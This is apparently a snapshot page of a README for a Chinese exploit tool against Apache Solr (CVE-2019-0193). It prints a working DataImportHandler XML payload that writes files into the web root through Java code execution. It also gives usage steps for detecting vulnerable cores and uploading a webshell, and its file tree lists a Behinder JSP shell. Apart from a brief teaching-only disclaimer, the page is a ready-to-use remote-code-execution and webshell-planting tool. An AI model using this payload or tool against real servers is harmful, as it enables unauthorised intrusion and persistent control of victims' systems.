关联漏洞
标题:
Apache Solr 代码注入漏洞
(CVE-2019-0193)
描述:Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 Apache Solr 8.2.0之前版本中存在代码注入漏洞。攻击者可利用该漏洞在目标服务器上执行恶意代码。
描述
ApacheSolrRCE(CVE-2019-0193)一键写shell,原理是通过代码执行的java文件流写的马。
介绍
# 项目声明
只用于信息安全教学交流,请勿用于非法测试和攻击。
# ApacheSolrRCE
ApacheSolrRCE(CVE-2019-0193)一键写shell,原理是通过代码执行的java文件流写的马。
注:作者本人比较菜,如果你有bug或者有别的需求,请自行下载代码修改。
# 工具说明
由于互联网上流传的payload都是命令执行,且不方便上webshell,因此写了这段payload(回显123456时,代表写入成功)。
注:工具只能辅助测试,如果工具写不进去,建议手写。
```
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
<script><![CDATA[
function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;
}
]]></script>
<document>
<entity
stream="true"
name="entity1"
datasource="streamsrc1"
processor="XPathEntityProcessor"
rootEntity="true"
forEach="/RDF/item"
transformer="script:poc">
<field column="title" xpath="/RDF/item/title" />
</entity>
</document>
</dataConfig>
```
# 工具用法
<img src="https://github.com/jdr2021/ApacheSolrRCE/blob/master/1663056645344.jpg">
先点检测,获得core,并且判断有没有漏洞。
在点击getshell即可。
注:将你的webshell,放在shell目录下,工具会自动加载你的webshell至下拉列表中。
<img src="https://github.com/jdr2021/ApacheSolrRCE/blob/master/1663056948552.jpg">
默认代理是http代理,端口是8080,代码里面写死了的,需要的自己编译修改即可。
<img src="https://github.com/jdr2021/ApacheSolrRCE/blob/master/1663057045317.jpg">
# 特别感谢
[solr_exploit](https://github.com/1135/solr_exploit)
文件快照
[4.0K] /data/pocs/e46b210bb63d9272b326a760bf335253fe0905b4
├── [ 26K] 1663056645344.jpg
├── [ 16K] 1663056948552.jpg
├── [ 23K] 1663057045317.jpg
├── [1.1K] pom.xml
├── [2.0K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ ├── [4.0K] META-INF
│ │ └── [ 57] MANIFEST.MF
│ └── [4.0K] org
│ └── [4.0K] example
│ ├── [4.0K] exp
│ │ └── [3.1K] CVE_2019_0193.java
│ ├── [4.0K] main
│ │ ├── [4.9K] mainController.java
│ │ └── [ 820] main.java
│ └── [4.0K] tools
│ ├── [2.9K] HttpUtil.java
│ └── [1.4K] Shell.java
└── [4.0K] resources
├── [4.0K] org
│ └── [4.0K] example
│ └── [4.0K] main
│ └── [3.5K] ui.fxml
└── [4.0K] shell
└── [ 533] Behinder3.jsp
14 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。